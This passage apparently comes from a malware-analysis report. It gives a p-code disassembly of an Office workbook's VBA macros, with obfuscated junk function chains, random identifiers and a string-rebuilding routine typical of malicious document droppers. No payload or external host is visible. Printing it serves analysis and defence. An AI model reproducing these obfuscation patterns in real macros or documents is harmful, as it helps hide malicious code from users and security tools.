' 	ArgsCall (Call) rzGwrPUM9xS2rvCsRX6OdVek 0x0000 
' Line #38:
' 	EndFunc 
' Line #39:
' 	FuncDefn (Function rzGwrPUM9xS2rvCsRX6OdVek(id_FFFE As Single) As Single)
' Line #40:
' 	ArgsCall (Call) hx2errEArb 0x0000 
' Line #41:
' 	EndFunc 
' Line #42:
' 	FuncDefn (Static Function hx2errEArb(id_FFFE As Date) As Date)
' Line #43:
' 	ArgsCall (Call) DlkYXBK4r3WCbBQoVfs4z78E 0x0000 
' Line #44:
' 	EndFunc 
' Line #45:
' 	FuncDefn (Function DlkYXBK4r3WCbBQoVfs4z78E(id_FFFE As Variant) As Variant)
' Line #46:
' 	ArgsCall (Call) FZ4yZPaWVH 0x0000 
' Line #47:
' 	EndFunc 
' Line #48:
' 	FuncDefn (Static Function FZ4yZPaWVH(id_FFFE As Date) As Date)
' Line #49:
' 	ArgsCall (Call) encv 0x0000 
' Line #50:
' 	EndFunc 
' Line #51:
' 	FuncDefn (Function encv(id_FFFE As Variant) As Variant)
' Line #52:
' 	ArgsCall (Call) tTip 0x0000 
' Line #53:
' 	EndFunc 
' Line #54:
' 	FuncDefn (Static Function tTip(id_FFFE As Double) As Double)
' Line #55:
' 	ArgsCall (Call) IKGcostIkfg 0x0000 
' Line #56:
' 	EndFunc 
' Line #57:
' 	FuncDefn (Function IKGcostIkfg(id_FFFE As Single) As Single)
' Line #58:
' 	ArgsCall (Call) kjJdix 0x0000 
' Line #59:
' 	EndFunc 
' Line #60:
' Line #61:
' 	FuncDefn (Function Fh(AppData, id_FFFE As Variant))
' Line #62:
' 	Dim 
' 	VarDefn nt (As String)
' Line #63:
' 	Dim 
' 	VarDefn id_02CA (As Double)
' Line #64:
' 	Dim 
' 	VarDefn Gh
' Line #65:
' 	Dim 
' 	VarDefn StrReverse
' Line #66:
' 	Dim 
' 	VarDefn id_02C8
' Line #67:
' 	Dim 
' 	VarDefn id_02CE (As Byte)
' Line #68:
' 	Dim 
' 	VarDefn id_02CC (As Variant)
' Line #69:
' 	Ld AppData 
' 	ArgsLd Jnfn 0x0001 
' 	St AppData 
' Line #70:
' 	StartForVariable 
' 	Ld id_02C8 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld AppData 
' 	FnLen 
' 	For 
' Line #71:
' 	Ld AppData 
' 	Ld id_02C8 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	St Gh 
' Line #72:
' Line #73:
' 	LitStr 0x0000 ""
' 	St nt 
' Line #74:
' 	LitDI2 0x0014 
' 	LitDI2 0x0007 
' 	Div 
' 	LitDI2 0x08F2 
' 	Div 
' 	St id_02CA 
' Line #75:
' 	LitDI2 0x0001 
' 	St id_02CE 
' Line #76:
' 	LitDI2 0x0002 
' 	St id_02CC 
' Line #77:
' 	Ld StrReverse 
' 	Ld Gh 
' 	ArgsLd bonusshoot 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd burgerorgan 0x0001 
' 	Concat 
' 	St StrReverse 
' Line #78:
' 	StartForVariable 
' 	Next 
' Line #79:
' Line #80:
' 	Ld StrReverse 
' 	St Fh 
' Line #81:
' Line #82:
' 	StartForVariable 
' 	Ld id_02CE 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld qoxnwkqnhfshhimr 
' 	FnLen 
' 	For 
' Line #83:
' Line #84:
' 	StartForVariable 
' 	Next 
' Line #85:
' 	StartForVariable 
' 	Ld id_02CC 
' 	EndForVariable 
' 	LitDI2 0x0002 
' 	Ld qoxnwkqnhfshhimr 
' 	FnLen 
' 	For 
' Line #86:
' 	StartForVariable 
' 	Next 
' Line #87:
' 	EndFunc 
' Line #88:
' Line #89:
' Line #90:
' 	FuncDefn (Function be3a8c1f30f1abadd648e22b16fdb57d5(be3a8c1f30f1abadd648e22b16fdb57d7, columnwall, id_FFFE As Variant))
' Line #91:
' 	LitStr 0x0001 "*"
' 	Ld be3a8c1f30f1abadd648e22b16fdb57d7 
' 	Concat 
' 	LitStr 0x0001 "*"
' 	Concat 
' 	St t0ea0a0840384a15e019665b2e996b73f 
' Line #92:
' 	Dim 
' 	VarDefn n2b549c2e42dc58d564726b5780212aza (As Double)
' Line #93:
' 	LitR8 0xEF9E 0xC6A7 0x114B 0x4084 
' 	St dhmpmrvyvrxwv 
' Line #94:
' 	Dim 
' 	VarDefn m974e3e334b64ac13b6dec997fbabf21f (As Byte)
' Line #95:
' 	LitR8 0x353F 0xBA5E 0xAFCD 0x40E5 
' 	St m974e3e334b64ac13b6dec997fbabf21f 
' Line #96:
' 	Dim 
' 	VarDefn b08576ffe41cb67690655f1261f410844 (As Long)
' Line #97:
' 	LitR8 0x8312 0xCAC0 0xA7A1 0x4081 
' 	St b08576ffe41cb67690655f1261f410844 
' Line #98:
' 	Dim 
' 	VarDefn z2c55929d38494d4bf3ab6ba3dd16305c (As Double)
' Line #99:
' 	LitR8 0xB852 0x851E 0xF8EB 0x408B 
' 	St z2c55929d38494d4bf3ab6ba3dd16305c 
' Line #100:
' 	Ld t5IOznwCrl 
' 	St b9d76f7072ca3da29e82e55579143fba0 
' Line #101:
' 	Dim 
' 	VarDefn kqeepfyakmzwuediw (As String)
' Line #102:
' 	LitStr 0x000B "naiveremove"
' 	St kqeepfyakmzwuediw 
' Line #103:
' 	Dim 
' 	VarDefn flamesight (As Byte)
' Line #104:
' 	LitR8 0x3127 0xAC08 0x3A1C 0x4033 
' 	St flamesight 
' Line #105:
' 	Dim 
' 	VarDefn sweartrust (As Boolean)
' Line #106:
' 	LitR8 0xE560 0x22D0 0x79DB 0x4057 
' 	St sweartrust 
' Line #107:
' 	Dim 
' 	VarDefn prqhhqrabc (As Double)
' Line #108:
' 	LitR8 0x7CEE 0x353F 0x2A5E 0x405B 
' 	St prqhhqrabc 
' Line #109:
' 	Dim 
' 	VarDefn yujmngFXscDEwqazzd (As Double)
' Line #110:
' 	LitR8 0x2B02 0x1687 0xBED9 0x404E 
' 	St yujmngFXscDEwqazzd 
' Line #111:
' 	Ld yujmngFXscDEwqazzd 
' 	LitR8 0xD2F2 0x624D 0xA810 0x4067 
' 	Ne 
' 	IfBlock 
' Line #112:
' 	Dim 
' 	VarDefn POLk00bh (As Byte)
' Line #113:
' 	LitR8 0xDD2F 0x0624 0x9981 0x406A 
' 	St POLk00bh 
' Line #114:
' 	Dim 
' 	VarDefn Sheet1 (As Long)
' Line #115:
' 	LitR8 0xAC08 0x5A1C 0x7F64 0x406D 
' 	St Sheet1 
' Line #116:
' 	Dim 
' 	VarDefn Sheet2 (As String)
' Line #117:
' 	LitStr 0x000C "fadzjgdilazu"
' 	St Sheet2 
' Line #118:
' 	EndIfBlock 
' Line #119:
' 	EndFunc 
' Line #120:
' Line #121:
' 	FuncDefn (Function Sheet3(id_FFFE As Long) As Long)
' Line #122:
' Line #123:
' 	ArgsCall (Call) Workbook 0x0000 
' Line #124:
' 	EndFunc 
' Line #125:
' Line #126:
' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.